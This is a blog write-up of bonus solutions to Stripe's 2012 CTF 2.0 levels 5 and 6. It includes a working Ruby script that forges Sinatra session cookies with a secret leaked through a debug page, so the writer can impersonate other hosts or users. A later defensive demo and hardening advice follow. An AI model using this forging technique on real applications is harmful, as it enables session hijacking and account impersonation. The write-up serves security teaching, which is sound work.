This article is part 10 of a 10-part blog series detailing the approaches and solutions to hacking through Stripe's 2012 CTF 2.0. To continue from the parent article, or to see more hacks, please click here.
This blog entry details some bonus approaches used by Andre Azzolini in attacking the Stripe CTF 2.0 Challenge Levels 5 and 6.
***
This vulnerability was patched early on, but I was able to use it to exploit both levels 5 and 6. At first, Sinatra 500 errors would generate the Sinatra debug page, which just so happened to include the secret key that the server was using to sign session cookies. In my case, it looked like this (octal escapes as Ruby's `inspect` prints them; the byte array in the script below is the same key):
dMx\354\341\260f\027\0270\212\236c\335\344\006\a\316\323\005\e\315\321\016
You also have access to your session cookie, which might have looked like this:
BAh7CCINdHJhY2tpbmd7CCIZSFRUUF9BQ0NFUFRfRU5DT0RJTkciLWVk MmIz%0AY2E5MGE0ZTcyMzQwMjM2N2ExZDE3YzhiMjgzOTI4NDIzOTgiG UhUVFBfQUND%0ARVBUX0xBTkdVQUdFIi1jYzlmNmZlYzY1MmE0MjU4Ym M2ZDI5Mjg3MDUyMTc5%0AYWIxZTBkMTQ3IhRIVFRQX1VTRVJfQUdFTlQ iLTFhNmIwMTRhNTRjZTg5YTJi%0AOTUzNGU3ZTA4NTUzYjA4NmI2MTc3 NDgiCWNzcmYiRTgwYjZlZTVhOGM3YjFi%0ANGM2NmFkM2NhNWEyM2I3N zg5YTNhMDViNjlhNGIwOWZlZWJmMGNhODVhMDU3%0AM2Y0ODYiD3Nlc3 Npb25faWQiRTdlYTY2ZjFlN2U2NDIwZWNkNThlMWExZWE0%0AM2YwYTU 2ZTE3YTZiZTBmYjRhNTM5MjczNWE1OGE0NGIyYTdlMzY%3D%0A--f0a1 6d0b063c881c92e519e5e933c07d0a06506d
Unfortunately, Sinatra is using a terrible HMAC function (really, it’s a MAC function — if it used HMAC, this wouldn’t have been a vulnerability).
Since we know this, we are able to manipulate our session cookie, replace certain values, and have it still validate. For example, for level 5, I replaced "level02-2.stripe-ctf.com" with "level05-1.stripe-ctf.com". For level 6, I replaced my username with "level07-password-holder". This then tricks Sinatra into thinking you're someone else. You can achieve this with the following simple code:
```ruby
require 'uri'
require 'base64'
require 'readline'
require 'openssl'

# Rack signs the Base64 payload with HMAC-SHA1 over the secret; this reproduces that.
def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
end

# paste in the original cookie value for this
# (URI.unescape/URI.escape were removed in Ruby 3.0; there use URI::DEFAULT_PARSER.unescape/escape)
decoded_original = Marshal.load(Base64.decode64(URI.unescape(Readline.readline('original: '))))
# this would be "level02-2.stripe-ctf.com" for example
value_to_be_replaced = Readline.readline('value to be replaced: ')
# this would be "level05-1.stripe-ctf.com" for example
value_to_replace_with = Readline.readline('value to replace with: ')

# substitute inside the Ruby-literal form of the session hash, then eval it back into a hash
hacked_value = decoded_original.inspect.sub(value_to_be_replaced, value_to_replace_with)
encoded_hacked = Base64.encode64(Marshal.dump(eval(hacked_value)))

# this is the unpacked representation of the "dMx..." key posted above
secret = [100, 77, 120, -20, -31, -80, 102, 23, 23, 48, -118, -98, 99, -35, -28, 6, 7, -50, -45, 5, 27, -51, -47, 14].pack('c*')

hmac = generate_hmac(encoded_hacked, secret)
uri_encoded_hacked = URI.escape(encoded_hacked)
puts "\nThe hacked cookie is: #{uri_encoded_hacked}--#{hmac}"
```
Simply set your session cookie to the value printed by the program, and you’ll have gained the authorization you were after!
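To make clear what the leaked key actually buys an attacker, and what the signature still catches, here is an added example (not code from the post, from Rack, or from Stripe) that re-implements the Rack::Session::Cookie layout used above: URL-escaped Base64 of a Marshal dump, then `--`, then the hex HMAC-SHA1 of the Base64 text under the server secret. The secret strings and the session contents are constructed placeholders. It shows that editing the payload without the key is rejected by the MAC check, that a forged session verifies once the key is known (so the MAC construction is not what failed; the key exposure on the error page is), and that rotating the secret invalidates every cookie signed with the old one.

```ruby
require 'base64'
require 'openssl'
require 'cgi'

# Constructed re-implementation of the cookie format (not Rack's own code):
#   cookie = url_escape(base64(Marshal.dump(session))) + "--" + hex(HMAC-SHA1(secret, base64))
def sign(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), secret, data)
end

def encode_session(session, secret)
  data = Base64.encode64(Marshal.dump(session))
  "#{CGI.escape(data)}--#{sign(data, secret)}"
end

# Byte-wise compare that never short-circuits, so the check does not leak
# how many hex digits of a guessed signature were correct.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Returns the session hash, or nil if the cookie was not signed with `secret`.
# Marshal.load runs only after the MAC passes: whoever holds the secret can make
# the server deserialize arbitrary objects, a second reason the key must never
# appear on an error page.
def decode_session(cookie, secret)
  data, digest = cookie.split('--', 2)
  return nil if data.nil? || digest.nil?
  data = CGI.unescape(data)
  return nil unless secure_compare(digest, sign(data, secret))
  Marshal.load(Base64.decode64(data))
end

# Edit the payload but keep the old signature: all someone WITHOUT the secret can do.
# Same-length replacement keeps Marshal's string length prefix valid.
def tamper_payload(cookie, from, to)
  data, digest = cookie.split('--', 2)
  dump = Base64.decode64(CGI.unescape(data)).sub(from.b, to.b)
  "#{CGI.escape(Base64.encode64(dump))}--#{digest}"
end

# Constructed placeholder secrets; the real one was read off the Sinatra error page.
LEAKED_SECRET  = 'constructed-leaked-secret'
ROTATED_SECRET = 'constructed-secret-after-rotation'

OLD_HOST = 'level02-2.stripe-ctf.com'
NEW_HOST = 'level05-1.stripe-ctf.com'

def demo
  original = encode_session({ 'tracking' => { 'host' => OLD_HOST } }, LEAKED_SECRET)
  {
    # payload edited without the key: signature mismatch, session rejected
    tampered: decode_session(tamper_payload(original, OLD_HOST, NEW_HOST), LEAKED_SECRET),
    # re-signed with the leaked key: verifies, the MAC cannot help once the key is public
    forged:   decode_session(encode_session({ 'tracking' => { 'host' => NEW_HOST } }, LEAKED_SECRET), LEAKED_SECRET),
    # after rotating the secret, cookies signed with the old key no longer verify
    rotated:  decode_session(original, ROTATED_SECRET)
  }
end

if __FILE__ == $0
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

The practical lessons for anyone running a Sinatra or Rack app are the ones this exercise makes visible: keep exception pages off in production so the secret never reaches a response, treat a leaked secret as a full session compromise and rotate it immediately, and do not put authorization-relevant facts (hostnames, usernames) in a client-held cookie if the server can look them up itself.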
***
These solutions are presented as a unique approach to a recent CTF hacking contest as an outreach of the Credera Security Team. All ‘hacking’ was performed in an ethical manner in accordance with Credera’s Core Values. For further information on Credera’s offerings in ethical hacking, security, compliance, and OWASP preparedness please contact us at securityteam@credera.com